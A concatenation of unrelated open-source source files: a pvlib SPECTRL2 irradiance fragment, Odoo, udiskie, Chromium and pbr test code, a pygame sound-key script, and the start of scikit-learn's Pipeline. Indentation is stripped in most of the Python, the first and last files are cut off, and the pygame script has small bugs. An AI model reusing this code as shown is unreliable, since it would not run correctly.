D, Tr, Ta, Tw, To, Tu, Tas, Taa = spectrl2
spectrum_et_adj = spectrum_et * D
# spectrum of direct irradiance, Eq 2-1
Id = spectrum_et_adj * Tr * Ta * Tw * To * Tu
cosZ = cosd(apparent_zenith)
# Eq 3-17
Cs = np.where(wavelength <= 450, ((wavelength + 550)/1000)**1.8, 1.0)
ALG = np.log(1 - aerosol_asymmetry_factor) # Eq 3-14
BFS = ALG * (0.0783 + ALG * (-0.3824 - ALG * 0.5874)) # Eq 3-13
AFS = ALG * (1.459 + ALG * (0.1595 + ALG * 0.4129)) # Eq 3-12
Fs = 1 - 0.5 * np.exp((AFS + BFS * cosZ) * cosZ) # Eq 3-11
    Fsp = 1 - 0.5 * np.exp((AFS + BFS / 1.8) / 1.8)  # Eq 3-15
# evaluate the "primed terms" -- transmittances evaluated at airmass=1.8
primes = _spectrl2_transmittances(apparent_zenith, 1.8,
surface_pressure, precipitable_water,
ozone, optical_thickness,
scattering_albedo, dayofyear)
_, Trp, Tap, Twp, Top, Tup, Tasp, Taap = primes
# Note: not sure what the correct form of this equation is.
# The first coefficient is To' in Eq 3-8 but Tu' in the code appendix.
# spectrl2_2.c uses Tu'.
sky_reflectivity = (
# Top * Twp * Taap * (0.5 * (1-Trp) + (1-Fsp) * Trp * (1-Tasp))
Tup * Twp * Taap * (0.5 * (1-Trp) + (1-Fsp) * Trp * (1-Tasp))
) # Eq 3-8
# a common factor for 3-5 and 3-6
common_factor = spectrum_et_adj * cosZ * To * Tu * Tw * Taa
# Note: spectrl2_2.c differs from the report in how the Cs value is used.
# The two commented out lines match the report, while the following match
# spectrl2_2.c. With regard to Cs, the equations in the report and
    # spectrl2_2.c are algebraically equivalent.
# Ir = common_factor * (1 - Tr**0.95) * 0.5 * Cs # Eq 3-5
# Ia = common_factor * Tr**1.5 * (1 - Tas) * Fs * Cs # Eq 3-6
Ir = common_factor * (1 - Tr**0.95) * 0.5 # Eq 3-5
Ia = common_factor * Tr**1.5 * (1 - Tas) * Fs # Eq 3-6
rs = sky_reflectivity
rg = ground_albedo
Ig = (Id * cosZ + Ir + Ia) * rs * rg / (1 - rs * rg) # Eq 3-7
# total scattered irradiance
# Note: see discussion about Cs above.
# Is = Ir + Ia + Ig # Eq 3-1
Is = (Ir + Ia + Ig) * Cs # Eq 3-1
# calculate spectral irradiance on a tilted surface, Eq 3-18
Ibeam = Id * cosd(aoi)
# don't need surface_azimuth if we provide projection_ratio
projection_ratio = cosd(aoi) / cosZ
Isky = pvlib.irradiance.haydavies(surface_tilt=surface_tilt,
surface_azimuth=None,
dhi=Is,
dni=Id,
dni_extra=spectrum_et_adj,
projection_ratio=projection_ratio)
ghi = Id * cosZ + Is
Iground = pvlib.irradiance.get_ground_diffuse(surface_tilt, ghi, albedo=rg)
Itilt = Ibeam + Isky + Iground
wavelength_1d = wavelength.reshape(-1) # only needs 1 dimension
return {
'wavelength': wavelength_1d,
'dni_extra': spectrum_et_adj,
'dhi': Is,
'dni': Id,
'poa_sky_diffuse': Isky,
'poa_ground_diffuse': Iground,
'poa_direct': Ibeam,
'poa_global': Itilt,
}
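# Usage sketch (hypothetical input values; in practice the solar-position and
# atmospheric inputs come from the corresponding pvlib functions):
#     spec = spectrl2(
#         apparent_zenith=50, aoi=20, surface_tilt=30, ground_albedo=0.2,
#         surface_pressure=101300, relative_airmass=1.5,
#         precipitable_water=1.5, ozone=0.31, aerosol_turbidity_500nm=0.1,
#         dayofyear=180)
#     # spec['wavelength'] has shape (122,); irradiance entries such as
#     # spec['poa_global'] have shape (122, 1), one column per simulation.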
| bsd-3-clause |
dgzurita/odoo | addons/l10n_fr/l10n_fr.py | 336 | 2089 | # -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2004-2010 Tiny SPRL (<http://tiny.be>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
from openerp.osv import fields, osv
class l10n_fr_report(osv.osv):
_name = 'l10n.fr.report'
_description = 'Report for l10n_fr'
_columns = {
'code': fields.char('Code', size=64),
'name': fields.char('Name'),
'line_ids': fields.one2many('l10n.fr.line', 'report_id', 'Lines', copy=True),
}
_sql_constraints = [
('code_uniq', 'unique (code)','The code report must be unique !')
]
class l10n_fr_line(osv.osv):
_name = 'l10n.fr.line'
_description = 'Report Lines for l10n_fr'
_columns = {
'code': fields.char('Variable Name', size=64),
'definition': fields.char('Definition'),
'name': fields.char('Name'),
'report_id': fields.many2one('l10n.fr.report', 'Report'),
}
_sql_constraints = [
('code_uniq', 'unique (code)', 'The variable name must be unique !')
]
class res_company(osv.osv):
_inherit = 'res.company'
_columns = {
'siret': fields.char('SIRET', size=14),
'ape': fields.char('APE'),
}
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
| agpl-3.0 |
mathstuf/udiskie | udiskie/locale.py | 2 | 1105 | """
I18n utilities.
"""
import gettext
__all__ = ['_']
class Translator(object):
"""
Simple translation and message formatting utility.
"""
@classmethod
def create(cls, domain, localedir=None, languages=None):
"""
Create a new translator for the given domain.
Arguments are as in ``gettext.translation``.
"""
t = gettext.translation(domain, localedir, languages, fallback=True)
try:
# on python2 we want the unicode version:
g = t.ugettext
except AttributeError:
# which is the default in python3:
g = t.gettext
return cls(g)
def __init__(self, gettext):
"""Initialize a translator with the given gettext function."""
self._gettext = gettext
def __call__(self, text, *args, **kwargs):
"""Translate and then and format the text with ``str.format``."""
msg = self._gettext(text)
if args or kwargs:
return msg.format(*args, **kwargs)
else:
return msg
_ = Translator.create('udiskie')
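# Usage sketch (hypothetical message and arguments): the format string is
# translated first, then filled in, e.g.
#     _('Mounted {0} on {1}', device_name, mount_path)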
| mit |
gfreed/android_external_chromium-org | chrome/common/extensions/docs/server2/cache_chain_object_store_test.py | 154 | 8532 | #!/usr/bin/env python
# Copyright 2013 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
from cache_chain_object_store import CacheChainObjectStore
from test_object_store import TestObjectStore
import unittest
class CacheChainObjectStoreTest(unittest.TestCase):
def setUp(self):
self._first = TestObjectStore('first', init={
'storage.html': 'storage',
})
self._second = TestObjectStore('second', init={
'runtime.html': 'runtime',
'storage.html': 'storage',
})
self._third = TestObjectStore('third', init={
'commands.html': 'commands',
'runtime.html': 'runtime',
'storage.html': 'storage',
})
self._store = CacheChainObjectStore(
(self._first, self._second, self._third))
def testGetFromFirstLayer(self):
self.assertEqual('storage', self._store.Get('storage.html').Get())
self.assertTrue(*self._first.CheckAndReset(get_count=1))
# Found in first layer, stop.
self.assertTrue(*self._second.CheckAndReset())
self.assertTrue(*self._third.CheckAndReset())
# Cached in memory, won't re-query.
self.assertEqual('storage', self._store.Get('storage.html').Get())
self.assertTrue(*self._first.CheckAndReset())
self.assertTrue(*self._second.CheckAndReset())
self.assertTrue(*self._third.CheckAndReset())
def testGetFromSecondLayer(self):
self.assertEqual('runtime', self._store.Get('runtime.html').Get())
# Not found in first layer but found in second.
self.assertTrue(*self._first.CheckAndReset(get_count=1, set_count=1))
self.assertTrue(*self._second.CheckAndReset(get_count=1))
self.assertTrue(*self._third.CheckAndReset())
# First will now have it cached.
self.assertEqual('runtime', self._first.Get('runtime.html').Get())
self._first.Reset()
# Cached in memory, won't re-query.
self.assertEqual('runtime', self._store.Get('runtime.html').Get())
self.assertTrue(*self._first.CheckAndReset())
self.assertTrue(*self._second.CheckAndReset())
self.assertTrue(*self._third.CheckAndReset())
def testGetFromThirdLayer(self):
self.assertEqual('commands', self._store.Get('commands.html').Get())
# As above but for third.
self.assertTrue(*self._first.CheckAndReset(get_count=1, set_count=1))
self.assertTrue(*self._second.CheckAndReset(get_count=1, set_count=1))
self.assertTrue(*self._third.CheckAndReset(get_count=1))
# First and second will now have it cached.
self.assertEqual('commands', self._first.Get('commands.html').Get())
self.assertEqual('commands', self._second.Get('commands.html').Get())
self._first.Reset()
self._second.Reset()
# Cached in memory, won't re-query.
self.assertEqual('commands', self._store.Get('commands.html').Get())
self.assertTrue(*self._first.CheckAndReset())
self.assertTrue(*self._second.CheckAndReset())
self.assertTrue(*self._third.CheckAndReset())
def testGetFromAllLayers(self):
self.assertEqual({
'commands.html': 'commands',
'runtime.html': 'runtime',
'storage.html': 'storage',
}, self._store.GetMulti(('commands.html',
'runtime.html',
'storage.html')).Get())
self.assertTrue(*self._first.CheckAndReset(get_count=1, set_count=1))
self.assertTrue(*self._second.CheckAndReset(get_count=1, set_count=1))
self.assertTrue(*self._third.CheckAndReset(get_count=1))
# First and second will have it all cached.
self.assertEqual('runtime', self._first.Get('runtime.html').Get())
self.assertEqual('commands', self._first.Get('commands.html').Get())
self.assertEqual('commands', self._second.Get('commands.html').Get())
self._first.Reset()
self._second.Reset()
# Cached in memory.
self.assertEqual({
'commands.html': 'commands',
'runtime.html': 'runtime',
'storage.html': 'storage',
}, self._store.GetMulti(('commands.html',
'runtime.html',
'storage.html')).Get())
self.assertTrue(*self._first.CheckAndReset())
self.assertTrue(*self._second.CheckAndReset())
self.assertTrue(*self._third.CheckAndReset())
def testPartiallyCachedInMemory(self):
self.assertEqual({
'commands.html': 'commands',
'storage.html': 'storage',
}, self._store.GetMulti(('commands.html', 'storage.html')).Get())
self.assertTrue(*self._first.CheckAndReset(get_count=1, set_count=1))
self.assertTrue(*self._second.CheckAndReset(get_count=1, set_count=1))
self.assertTrue(*self._third.CheckAndReset(get_count=1))
# runtime wasn't cached in memory, so stores should still be queried.
self.assertEqual({
'commands.html': 'commands',
'runtime.html': 'runtime',
}, self._store.GetMulti(('commands.html', 'runtime.html')).Get())
self.assertTrue(*self._first.CheckAndReset(get_count=1, set_count=1))
self.assertTrue(*self._second.CheckAndReset(get_count=1))
self.assertTrue(*self._third.CheckAndReset())
def testNotFound(self):
self.assertEqual(None, self._store.Get('notfound.html').Get())
self.assertTrue(*self._first.CheckAndReset(get_count=1))
self.assertTrue(*self._second.CheckAndReset(get_count=1))
self.assertTrue(*self._third.CheckAndReset(get_count=1))
# Not-foundedness shouldn't be cached.
self.assertEqual(None, self._store.Get('notfound.html').Get())
self.assertTrue(*self._first.CheckAndReset(get_count=1))
self.assertTrue(*self._second.CheckAndReset(get_count=1))
self.assertTrue(*self._third.CheckAndReset(get_count=1))
# Test some things not found, some things found.
self.assertEqual({
'runtime.html': 'runtime',
}, self._store.GetMulti(('runtime.html', 'notfound.html')).Get())
self.assertTrue(*self._first.CheckAndReset(get_count=1, set_count=1))
self.assertTrue(*self._second.CheckAndReset(get_count=1))
self.assertTrue(*self._third.CheckAndReset(get_count=1))
def testSet(self):
self._store.Set('hello.html', 'hello')
self.assertTrue(*self._first.CheckAndReset(set_count=1))
self.assertTrue(*self._second.CheckAndReset(set_count=1))
self.assertTrue(*self._third.CheckAndReset(set_count=1))
# Should have cached it.
self.assertEqual('hello', self._store.Get('hello.html').Get())
self.assertTrue(*self._first.CheckAndReset())
self.assertTrue(*self._second.CheckAndReset())
self.assertTrue(*self._third.CheckAndReset())
# Should have the new content.
self.assertEqual('hello', self._first.Get('hello.html').Get())
self.assertEqual('hello', self._second.Get('hello.html').Get())
self.assertEqual('hello', self._third.Get('hello.html').Get())
def testDel(self):
# Cache it.
self.assertEqual('storage', self._store.Get('storage.html').Get())
self.assertTrue(*self._first.CheckAndReset(get_count=1))
# Delete it.
self._store.Del('storage.html')
self.assertTrue(*self._first.CheckAndReset(del_count=1))
self.assertTrue(*self._second.CheckAndReset(del_count=1))
self.assertTrue(*self._third.CheckAndReset(del_count=1))
# Not cached anymore.
self.assertEqual(None, self._store.Get('storage.html').Get())
self.assertTrue(*self._first.CheckAndReset(get_count=1))
self.assertTrue(*self._second.CheckAndReset(get_count=1))
self.assertTrue(*self._third.CheckAndReset(get_count=1))
def testStartEmpty(self):
store = CacheChainObjectStore((self._first, self._second, self._third),
start_empty=True)
# Won't query delegate file systems because it starts empty.
self.assertEqual(None, store.Get('storage.html').Get())
self.assertTrue(*self._first.CheckAndReset())
self.assertTrue(*self._second.CheckAndReset())
self.assertTrue(*self._third.CheckAndReset())
# Setting values will set on all delegates, though.
store.Set('storage.html', 'new content')
self.assertEqual('new content', store.Get('storage.html').Get())
self.assertTrue(*self._first.CheckAndReset(set_count=1))
self.assertTrue(*self._second.CheckAndReset(set_count=1))
self.assertTrue(*self._third.CheckAndReset(set_count=1))
self.assertEqual('new content', self._first.Get('storage.html').Get())
self.assertEqual('new content', self._second.Get('storage.html').Get())
self.assertEqual('new content', self._third.Get('storage.html').Get())
if __name__ == '__main__':
unittest.main()
| bsd-3-clause |
midma101/AndIWasJustGoingToBed | .venv/lib/python2.7/site-packages/pbr/tests/test_setup.py | 4 | 14278 | # vim: tabstop=4 shiftwidth=4 softtabstop=4
# Copyright (c) 2011 OpenStack Foundation
# Copyright (c) 2013 Hewlett-Packard Development Company, L.P.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from __future__ import print_function
import os
import sys
import tempfile
try:
import cStringIO as io
BytesIO = io.StringIO
except ImportError:
import io
BytesIO = io.BytesIO
import fixtures
import testscenarios
from pbr import packaging
from pbr.tests import base
class EmailTestCase(base.BaseTestCase):
def test_str_dict_replace(self):
string = 'Johnnie T. Hozer'
mapping = {'T.': 'The'}
self.assertEqual('Johnnie The Hozer',
packaging.canonicalize_emails(string, mapping))
class MailmapTestCase(base.BaseTestCase):
def setUp(self):
super(MailmapTestCase, self).setUp()
self.root_dir = self.useFixture(fixtures.TempDir()).path
self.mailmap = os.path.join(self.root_dir, '.mailmap')
def test_mailmap_with_fullname(self):
with open(self.mailmap, 'w') as mm_fh:
mm_fh.write("Foo Bar <[email protected]> Foo Bar <[email protected]>\n")
self.assertEqual({'<[email protected]>': '<[email protected]>'},
packaging.read_git_mailmap(self.root_dir))
def test_mailmap_with_firstname(self):
with open(self.mailmap, 'w') as mm_fh:
mm_fh.write("Foo <[email protected]> Foo <[email protected]>\n")
self.assertEqual({'<[email protected]>': '<[email protected]>'},
packaging.read_git_mailmap(self.root_dir))
def test_mailmap_with_noname(self):
with open(self.mailmap, 'w') as mm_fh:
mm_fh.write("<[email protected]> <[email protected]>\n")
self.assertEqual({'<[email protected]>': '<[email protected]>'},
packaging.read_git_mailmap(self.root_dir))
class SkipFileWrites(base.BaseTestCase):
scenarios = [
('changelog_option_true',
dict(option_key='skip_changelog', option_value='True',
env_key='SKIP_WRITE_GIT_CHANGELOG', env_value=None,
pkg_func=packaging.write_git_changelog, filename='ChangeLog')),
('changelog_option_false',
dict(option_key='skip_changelog', option_value='False',
env_key='SKIP_WRITE_GIT_CHANGELOG', env_value=None,
pkg_func=packaging.write_git_changelog, filename='ChangeLog')),
('changelog_env_true',
dict(option_key='skip_changelog', option_value='False',
env_key='SKIP_WRITE_GIT_CHANGELOG', env_value='True',
pkg_func=packaging.write_git_changelog, filename='ChangeLog')),
('changelog_both_true',
dict(option_key='skip_changelog', option_value='True',
env_key='SKIP_WRITE_GIT_CHANGELOG', env_value='True',
pkg_func=packaging.write_git_changelog, filename='ChangeLog')),
('authors_option_true',
dict(option_key='skip_authors', option_value='True',
env_key='SKIP_GENERATE_AUTHORS', env_value=None,
pkg_func=packaging.generate_authors, filename='AUTHORS')),
('authors_option_false',
dict(option_key='skip_authors', option_value='False',
env_key='SKIP_GENERATE_AUTHORS', env_value=None,
pkg_func=packaging.generate_authors, filename='AUTHORS')),
('authors_env_true',
dict(option_key='skip_authors', option_value='False',
env_key='SKIP_GENERATE_AUTHORS', env_value='True',
pkg_func=packaging.generate_authors, filename='AUTHORS')),
('authors_both_true',
dict(option_key='skip_authors', option_value='True',
env_key='SKIP_GENERATE_AUTHORS', env_value='True',
pkg_func=packaging.generate_authors, filename='AUTHORS')),
]
def setUp(self):
super(SkipFileWrites, self).setUp()
self.temp_path = self.useFixture(fixtures.TempDir()).path
self.root_dir = os.path.abspath(os.path.curdir)
self.git_dir = os.path.join(self.root_dir, ".git")
if not os.path.exists(self.git_dir):
self.skipTest("%s is missing; skipping git-related checks"
% self.git_dir)
return
self.filename = os.path.join(self.temp_path, self.filename)
self.option_dict = dict()
if self.option_key is not None:
self.option_dict[self.option_key] = ('setup.cfg',
self.option_value)
self.useFixture(
fixtures.EnvironmentVariable(self.env_key, self.env_value))
def test_skip(self):
self.pkg_func(git_dir=self.git_dir,
dest_dir=self.temp_path,
option_dict=self.option_dict)
self.assertEqual(
not os.path.exists(self.filename),
(self.option_value.lower() in packaging.TRUE_VALUES
or self.env_value is not None))
class GitLogsTest(base.BaseTestCase):
def setUp(self):
super(GitLogsTest, self).setUp()
self.temp_path = self.useFixture(fixtures.TempDir()).path
self.root_dir = os.path.abspath(os.path.curdir)
self.git_dir = os.path.join(self.root_dir, ".git")
self.useFixture(
fixtures.EnvironmentVariable('SKIP_GENERATE_AUTHORS'))
self.useFixture(
fixtures.EnvironmentVariable('SKIP_WRITE_GIT_CHANGELOG'))
def test_write_git_changelog(self):
exist_files = [os.path.join(self.root_dir, f)
for f in (".git", ".mailmap")]
self.useFixture(fixtures.MonkeyPatch(
"os.path.exists",
lambda path: os.path.abspath(path) in exist_files))
self.useFixture(fixtures.FakePopen(lambda _: {
"stdout": BytesIO("Author: Foo Bar "
"<[email protected]>\n".encode('utf-8'))
}))
def _fake_read_git_mailmap(*args):
return {"[email protected]": "[email protected]"}
self.useFixture(fixtures.MonkeyPatch("pbr.packaging.read_git_mailmap",
_fake_read_git_mailmap))
packaging.write_git_changelog(git_dir=self.git_dir,
dest_dir=self.temp_path)
with open(os.path.join(self.temp_path, "ChangeLog"), "r") as ch_fh:
self.assertTrue("[email protected]" in ch_fh.read())
def test_generate_authors(self):
author_old = u"Foo Foo <[email protected]>"
author_new = u"Bar Bar <[email protected]>"
co_author = u"Foo Bar <[email protected]>"
co_author_by = u"Co-authored-by: " + co_author
git_log_cmd = (
"git --git-dir=%s log --format=%%aN <%%aE>" % self.git_dir)
git_co_log_cmd = ("git --git-dir=%s log" % self.git_dir)
git_top_level = "git rev-parse --show-toplevel"
cmd_map = {
git_log_cmd: author_new,
git_co_log_cmd: co_author_by,
git_top_level: self.root_dir,
}
exist_files = [self.git_dir,
os.path.join(self.temp_path, "AUTHORS.in")]
self.useFixture(fixtures.MonkeyPatch(
"os.path.exists",
lambda path: os.path.abspath(path) in exist_files))
def _fake_run_shell_command(cmd, **kwargs):
return cmd_map[" ".join(cmd)]
self.useFixture(fixtures.MonkeyPatch(
"pbr.packaging._run_shell_command",
_fake_run_shell_command))
with open(os.path.join(self.temp_path, "AUTHORS.in"), "w") as auth_fh:
auth_fh.write("%s\n" % author_old)
packaging.generate_authors(git_dir=self.git_dir,
dest_dir=self.temp_path)
with open(os.path.join(self.temp_path, "AUTHORS"), "r") as auth_fh:
authors = auth_fh.read()
self.assertTrue(author_old in authors)
self.assertTrue(author_new in authors)
self.assertTrue(co_author in authors)
class BuildSphinxTest(base.BaseTestCase):
scenarios = [
('true_autodoc_caps',
dict(has_opt=True, autodoc='True', has_autodoc=True)),
('true_autodoc_lower',
dict(has_opt=True, autodoc='true', has_autodoc=True)),
('false_autodoc',
dict(has_opt=True, autodoc='False', has_autodoc=False)),
('no_autodoc',
dict(has_opt=False, autodoc='False', has_autodoc=False)),
]
def setUp(self):
super(BuildSphinxTest, self).setUp()
self.useFixture(fixtures.MonkeyPatch(
"sphinx.setup_command.BuildDoc.run", lambda self: None))
from distutils import dist
self.distr = dist.Distribution()
self.distr.packages = ("fake_package",)
self.distr.command_options["build_sphinx"] = {
"source_dir": ["a", "."]}
pkg_fixture = fixtures.PythonPackage(
"fake_package", [("fake_module.py", b"")])
self.useFixture(pkg_fixture)
self.useFixture(base.DiveDir(pkg_fixture.base))
def test_build_doc(self):
if self.has_opt:
self.distr.command_options["pbr"] = {
"autodoc_index_modules": ('setup.cfg', self.autodoc)}
build_doc = packaging.LocalBuildDoc(self.distr)
build_doc.run()
self.assertTrue(
os.path.exists("api/autoindex.rst") == self.has_autodoc)
self.assertTrue(
os.path.exists(
"api/fake_package.fake_module.rst") == self.has_autodoc)
class ParseRequirementsTest(base.BaseTestCase):
def setUp(self):
super(ParseRequirementsTest, self).setUp()
(fd, self.tmp_file) = tempfile.mkstemp(prefix='openstack',
suffix='.setup')
def test_parse_requirements_normal(self):
with open(self.tmp_file, 'w') as fh:
fh.write("foo\nbar")
self.assertEqual(['foo', 'bar'],
packaging.parse_requirements([self.tmp_file]))
def test_parse_requirements_with_git_egg_url(self):
with open(self.tmp_file, 'w') as fh:
fh.write("-e git://foo.com/zipball#egg=bar")
self.assertEqual(['bar'],
packaging.parse_requirements([self.tmp_file]))
def test_parse_requirements_with_versioned_git_egg_url(self):
with open(self.tmp_file, 'w') as fh:
fh.write("-e git://foo.com/zipball#egg=bar-1.2.4")
self.assertEqual(['bar>=1.2.4'],
packaging.parse_requirements([self.tmp_file]))
def test_parse_requirements_with_http_egg_url(self):
with open(self.tmp_file, 'w') as fh:
fh.write("https://foo.com/zipball#egg=bar")
self.assertEqual(['bar'],
packaging.parse_requirements([self.tmp_file]))
def test_parse_requirements_with_versioned_http_egg_url(self):
with open(self.tmp_file, 'w') as fh:
fh.write("https://foo.com/zipball#egg=bar-4.2.1")
self.assertEqual(['bar>=4.2.1'],
packaging.parse_requirements([self.tmp_file]))
def test_parse_requirements_removes_index_lines(self):
with open(self.tmp_file, 'w') as fh:
fh.write("-f foobar")
self.assertEqual([], packaging.parse_requirements([self.tmp_file]))
def test_parse_requirements_removes_argparse(self):
with open(self.tmp_file, 'w') as fh:
fh.write("argparse")
if sys.version_info >= (2, 7):
self.assertEqual([], packaging.parse_requirements([self.tmp_file]))
def test_parse_requirements_override_with_env(self):
with open(self.tmp_file, 'w') as fh:
fh.write("foo\nbar")
self.useFixture(
fixtures.EnvironmentVariable('PBR_REQUIREMENTS_FILES',
self.tmp_file))
self.assertEqual(['foo', 'bar'],
packaging.parse_requirements())
def test_parse_requirements_override_with_env_multiple_files(self):
with open(self.tmp_file, 'w') as fh:
fh.write("foo\nbar")
self.useFixture(
fixtures.EnvironmentVariable('PBR_REQUIREMENTS_FILES',
"no-such-file," + self.tmp_file))
self.assertEqual(['foo', 'bar'],
packaging.parse_requirements())
def test_get_requirement_from_file_empty(self):
actual = packaging.get_reqs_from_files([])
self.assertEqual([], actual)
def test_parse_requirements_with_comments(self):
with open(self.tmp_file, 'w') as fh:
fh.write("# this is a comment\nfoobar\n# and another one\nfoobaz")
self.assertEqual(['foobar', 'foobaz'],
packaging.parse_requirements([self.tmp_file]))
class ParseDependencyLinksTest(base.BaseTestCase):
def setUp(self):
super(ParseDependencyLinksTest, self).setUp()
(fd, self.tmp_file) = tempfile.mkstemp(prefix="openstack",
suffix=".setup")
def test_parse_dependency_normal(self):
with open(self.tmp_file, "w") as fh:
fh.write("http://test.com\n")
self.assertEqual(
["http://test.com"],
packaging.parse_dependency_links([self.tmp_file]))
def test_parse_dependency_with_git_egg_url(self):
with open(self.tmp_file, "w") as fh:
fh.write("-e git://foo.com/zipball#egg=bar")
self.assertEqual(
["git://foo.com/zipball#egg=bar"],
packaging.parse_dependency_links([self.tmp_file]))
def load_tests(loader, in_tests, pattern):
return testscenarios.load_tests_apply_scenarios(loader, in_tests, pattern)
| mit |
ThisIsRobokitty/sound-particle-generator | src/input/proj3keyboardinput.py | 1 | 2957 | '''
Implements a pygame mixer to play sound files; sounds can be mapped to keyboard input.
The sound files must be present in the 'input' directory relative to the working directory.
Links to sound libraries:
http://www.findsounds.com/
http://soundcavern.free.fr/guitar/
'''
import pygame,random, array
from pygame.locals import *
xmax = 1000 #width of window
ymax = 600 #height of window
# VVV Added part VVV
#pygame.mixer.pre_init(44100, -16, 2, 2048) # setup mixer to avoid sound lag
pygame.mixer.init(48000, -16, 1, 1024)
pygame.init()
fadeTime=1000
maxTime=0,1,10,100,1000
pygame.mixer.fadeout(fadeTime)
try:
#piano
c3 = pygame.mixer.Sound('input\c3.wav')
c4 = pygame.mixer.Sound('input\c4.wav')
c5 = pygame.mixer.Sound('input\c5.wav')
c6 = pygame.mixer.Sound('input\c6.wav')
c7 = pygame.mixer.Sound('input\c7.wav')
c8 = pygame.mixer.Sound('input\c8.wav')
'''
#guitar
gh3 = pygame.mixer.Sound('input\gh3.wav')
gh4 = pygame.mixer.Sound('input\gh4.wav')
gn3 = pygame.mixer.Sound('input\gn3.wav')
gn4 = pygame.mixer.Sound('input\gn4.wav')
gn5 = pygame.mixer.Sound('input\gn5.wav')
gp3 = pygame.mixer.Sound('input\gp3.wav')
gp4 = pygame.mixer.Sound('input\gp4.wav')
gs3 = pygame.mixer.Sound('input\gs3.wav')
gs4 = pygame.mixer.Sound('input\gs4.wav')
'''
#better guitar
A = pygame.mixer.Sound('input\A.wav')
B = pygame.mixer.Sound('input\B.wav')
D = pygame.mixer.Sound('input\D.wav')
E = pygame.mixer.Sound('input\E.wav')
G = pygame.mixer.Sound('input\G.wav')
#guitar
g1 = pygame.mixer.Sound('input\g1.wav')
g2 = pygame.mixer.Sound('input\g2.wav')
g3 = pygame.mixer.Sound('input\g3.wav')
g4 = pygame.mixer.Sound('input\g4.wav')
g5 = pygame.mixer.Sound('input\g5.wav')
g6 = pygame.mixer.Sound('input\g6.wav')
except:
raise UserWarning("Could not load or play soundfiles in 'data' folder :-(")
def input(event):
if event.key == K_ESCAPE:
exitflag = True
elif event.key == pygame.K_z:
g1.play()
elif event.key == pygame.K_x:
g2.play()
elif event.key == pygame.K_c:
g3.play()
elif event.key == pygame.K_v:
g4.play()
elif event.key == pygame.K_b:
g5.play()
elif event.key == pygame.K_n:
g6.play()
    # piano
elif event.key == pygame.K_q:
c3.play()
elif event.key == pygame.K_w:
c4.play()
elif event.key == pygame.K_e:
c5.play()
elif event.key == pygame.K_r:
c6.play()
elif event.key == pygame.K_t:
c7.play()
elif event.key == pygame.K_y:
c8.play()
#guitar
elif event.key == pygame.K_a:
A.play()
elif event.key == pygame.K_s:
B.play()
elif event.key == pygame.K_d:
D.play()
elif event.key == pygame.K_f:
E.play()
elif event.key == pygame.K_g:
G.play()
return random.randint(0,1000)
if __name__ == "__main__":
input() | mit |
ElDeveloper/scikit-learn | sklearn/pipeline.py | 61 | 21271 | """
The :mod:`sklearn.pipeline` module implements utilities to build a composite
estimator, as a chain of transforms and estimators.
"""
# Author: Edouard Duchesnay
# Gael Varoquaux
# Virgile Fritsch
# Alexandre Gramfort
# Lars Buitinck
# Licence: BSD
from collections import defaultdict
from warnings import warn
import numpy as np
from scipy import sparse
from .base import BaseEstimator, TransformerMixin
from .externals.joblib import Parallel, delayed
from .externals import six
from .utils import tosequence
from .utils.metaestimators import if_delegate_has_method
from .externals.six import iteritems
__all__ = ['Pipeline', 'FeatureUnion']
class Pipeline(BaseEstimator):
"""Pipeline of transforms with a final estimator.
Sequentially apply a list of transforms and a final estimator.
Intermediate steps of the pipeline must be 'transforms', that is, they
must implement fit and transform methods.
The final estimator only needs to implement fit.
The purpose of the pipeline is to assemble several steps that can be
cross-validated together while setting different parameters.
For this, it enables setting parameters of the various steps using their
names and the parameter name separated by a '__', as in the example below.
Read more in the :ref:`User Guide <pipeline>`.
Parameters
----------
steps : list
List of (name, transform) tuples (implementing fit/transform) that are
chained, in the order in which they are chained, with the last object
an estimator.
Attributes
----------
named_steps : dict
Read-only attribute to access any step parameter by user given name.
Keys are step names and values are steps parameters.
Examples
--------
>>> from sklearn import svm
>>> from sklearn.datasets import samples_generator
>>> from sklearn.feature_selection import SelectKBest
>>> from sklearn.feature_selection import f_regression
>>> from sklearn.pipeline import Pipeline
>>> # generate some data to play with
>>> X, y = samples_generator.make_classification(
... n_informative=5, n_redundant=0, random_state=42)
>>> # ANOVA SVM-C
>>> anova_filter = SelectKBest(f_regression, k=5)
>>> clf = svm.SVC(kernel='linear')
>>> anova_svm = Pipeline([('anova', anova_filter), ('svc', clf)])
>>> # You can set the parameters using the names issued
>>> # For instance, fit using a k of 10 in the SelectKBest
>>> # and a parameter 'C' of the svm
>>> anova_svm.set_params(anova__k=10, svc__C=.1).fit(X, y)
... # doctest: +ELLIPSIS
Pipeline(steps=[...])
>>> prediction = anova_svm.predict(X)
>>> anova_svm.score(X, y) # doctest: +ELLIPSIS
0.77...
>>> # getting the selected features chosen by anova_filter
>>> anova_svm.named_steps['anova'].get_support()
... # doctest: +NORMALIZE_WHITESPACE
array([ True, True, True, False, False, True, False, True, True, True,
False, False, True, False, True, False, False, False, False,
True], dtype=bool)
"""
# BaseEstimator interface
def __init__(self, steps):
names, estimators = zip(*steps)
if len(dict(steps)) != len(steps):
raise ValueError("Provided step names are not unique: %s" % (names,))
# shallow copy of steps
self.steps = tosequence(steps)
transforms = estimators[:-1]
estimator = estimators[-1]
for t in transforms:
if (not (hasattr(t, "fit") or hasattr(t, "fit_transform")) or not
hasattr(t, "transform")):
raise TypeError("All intermediate steps of the chain should "
"be transforms and implement fit and transform"
" '%s' (type %s) doesn't)" % (t, type(t)))
